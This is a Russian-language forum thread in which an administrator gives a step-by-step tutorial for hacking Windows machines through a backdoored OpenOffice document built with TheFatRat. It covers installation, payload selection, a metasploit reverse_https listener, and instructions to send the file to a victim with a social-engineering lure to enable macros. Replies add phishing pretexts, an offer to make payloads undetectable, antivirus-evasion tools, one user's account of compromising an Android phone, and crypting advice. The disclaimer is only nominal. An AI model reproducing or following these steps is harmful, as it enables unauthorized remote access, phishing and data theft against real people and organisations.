• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Авторская статья TheFatRat взлом Windows через OpenOffice

Vanessa

Гарант

Vanessa

Гарант
Команда форума
Админ
Сообщения
856
Реакции
2.216
0 руб.
2.PNG Сегодня мы поговорим о том, как с помощью инструмента TheFatRat можно взломать любой компьютер на Windows.

OpenOffice -это бесплатная альтернатива Microsoft Office. Не так много, кто использует эту программу, но в небольших фирмах, университетах вынуждены пользоваться именно ей. В связи с тем, что нет бюджета на покупку официальной лицензии Microsoft, а нелицензионной пользоваться запрещено.
Не используйте это в корыстных целях, чтобы рассылать вирус по почтам фирм, людей, взломать и получить всю нужную, интересную информацию. Здесь все представлено лишь для ознакомления.
The Fat Rat - Backdoor для удаленного доступа. Использовать мы его будем на Kali Linux.

Установка
Код:
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat/
bash setup.sh
Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:
Код:
fatrat
Можете ознакомиться и протестировать все приведенные способы взлома. Но те, что подписаны FUD, уже детектятся 10-20 антивирусами, в том числе и вирус Microsoft Office.

Создание вируса
eb0f77e2c0ca.png


Вводим
Код:
7
347151109b86.png


Вводим
Код:
4
и ваш IPV4 адрес, любой неиспользуемый порт, затем название документа
33215ab796fa.png


Выбираем полезную нагрузку, например, 6.
ebab362f6e8a.png


Все, ваш файл готов по указанному пути. Отправляйте жертве.
7f6d4ac81aef.png


Взлом
Далее мы должны подождать пока сессия откроется. Используем metasploit.
Код:
msfconsole
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
441a6c9ee56b.png


Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter.

Рассылая письмом под видом важного документа, необходимо использовать СИ, чтобы разрешили запуск макросов. К примеру, "в документе приведены расчеты за каждый месяц 2017 года. Для автоматического запуска расчетов необходимо разрешить выполнение макросов. "
Ну и все. А дальше делать в консоли можно все, что захотите. Скачивайте, скриньте итп.
Детект вируса 2/38 VirusCheckMate | Online virus scanner
 
Последнее редактирование:

mixa264

Авторитет
Сообщения
1.445
Реакции
2.117
0 руб.
Писать желательно, под заключение договора. Плюс несколько писем ни о чём: прайс попросить,
как с кризисом борются, телефон спросить главного или кто это курирует. Пару раз позвонить о времени СОГЛАСОВАНИЯ и т.п. Это расчистит дорогу СИ и повысит доверие.
Бывает при первоначальном заключении договоров требуют Выписку с ЕГЮРЛ, ОГРН,ИНН,УСТАВ, приказ о назначении. С этой толпой доков с разными расширениями( PDF, сканы, Ворд ) можно отправиь свой сюрприз))
 

nullSafeness

Местный
Сообщения
164
Реакции
91
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Могу сделать чистку, тупо FUD, в лс
 

Vanessa

Гарант

Vanessa

Гарант
Команда форума
Админ
Сообщения
856
Реакции
2.216
0 руб.

Vanessa

Гарант

Vanessa

Гарант
Команда форума
Админ
Сообщения
856
Реакции
2.216
0 руб.
Заинтересован в этом. Есть какие-либо материалы почитать?
Смотря от какого антивируса нужно. Veil-evasion, shelter к примеру. В поиске есть.. Собиралась написать статьи по этому поводу. Пока руки не доходят
 

Tema69

Участник
Сообщения
43
Реакции
7
0 руб.
Telegram
Смотря от какого антивируса нужно. Veil-evasion, shelter к примеру. В поиске есть.. Собиралась написать статьи по этому поводу. Пока руки не доходят
А статьи то полезные будут, многим ведь лень что либо искать на просторах интернета, да и здесь также
 

Tema69

Участник
Сообщения
43
Реакции
7
0 руб.
Telegram
Если лень, то шагай лесом! Тебе здесь схемы выкладывают, много тестит их, а тебе на блюдечке подай. Может за тебя работать? Пришли реквизиты куда тебе профит скидывать:mad:
Я вроде как о себе не говорил, читайте внимательнее!
 

Sochi23

Участник
Сообщения
29
Реакции
7
0 руб.
Telegram
Отлично!!! как швейцарские часы работает, но при отправке sms невозможно поставить пробел\ жесть как плохо!!!!!
 

Vanessa

Гарант

Vanessa

Гарант
Команда форума
Админ
Сообщения
856
Реакции
2.216
0 руб.

Sochi23

Участник
Сообщения
29
Реакции
7
0 руб.
Telegram
Вроде бы вы ошиблись темой
вроде нет. я этой крысой арк сделал, msfconsole meterpreter все дела. доступ к андрюше == но вот беда, то что надо было не работает. спасибо огромное крыса хороша!!!
 

Vanessa

Гарант

Vanessa

Гарант
Команда форума
Админ
Сообщения
856
Реакции
2.216
0 руб.
вроде нет. я этой крысой арк сделал, msfconsole meterpreter все дела. доступ к андрюше == но вот беда, то что надо было не работает. спасибо огромное крыса хороша!!!
аа, вы вобщем про FatRat)
 

Sochi23

Участник
Сообщения
29
Реакции
7
0 руб.
Telegram
В кали есть свои инструменты, спасибо
Еще раз Здрасте! вот как всегда победишь одно, так другое вылезет: случайно не подскажите в каком направление двигаться, TheFatRat создал арк, но необходимо криптонуть, тут я и тону в море инфо, а толку нет)))
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Еще раз Здрасте! вот как всегда победишь одно, так другое вылезет: случайно не подскажите в каком направление двигаться, TheFatRat создал арк, но необходимо криптонуть, тут я и тону в море инфо, а толку нет)))
Ты не в той теме вопрос задал. Крипт апк тема специфическая, обычно это ручками делают, а потому дороговато. Если только обфусцировать.
 
Сверху Снизу